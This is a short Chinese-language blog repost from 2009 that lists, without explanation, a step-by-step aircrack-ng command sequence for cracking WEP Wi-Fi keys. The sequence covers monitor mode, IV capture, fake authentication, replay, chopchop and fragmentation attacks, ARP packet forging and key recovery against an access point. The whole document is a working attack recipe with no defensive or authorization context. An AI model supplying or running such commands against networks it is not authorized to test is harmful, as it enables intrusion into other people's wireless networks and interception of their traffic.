2009年10月28日 星期三

[WEP破解] 手动破解命令[轉貼]

出自:http://www.anywlan.com/bbs/thread-32757-1-1.html

[WEP破解] 手动破解命令!
ifconfig -a
ifconfig -a wifi0 up
airmon-ng start wifi0 6
airodump-ng --ivs -w 007 -c 6 ath1

aireplay-ng -1 0 -e TP-LINK -a 001122334455 -h 223377889900 ath1
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b 001122334455 -h 223377889900 ath1
----------- -3 Crack Mode-----------
aireplay-ng -3 -b 001122334455 -h 223377889900 ath1
----------- -4 Crack Mode-----------
aireplay-ng -4 -b 001122334455 -h 223377889900 ath1
packetforge-ng -0 -a 001122334455 -h 223377889900 -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
----------- -5 Crack Mode-----------
aireplay-ng -5 -b 001122334455 -h 223377889900 ath1
packetforge-ng -0 -a 001122334455 -h 223377889900 -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 ath1
-----------Crack Key-----------
aircrack-ng -n 64 -b 001122334455 007-01.ivs

沒有留言:

張貼留言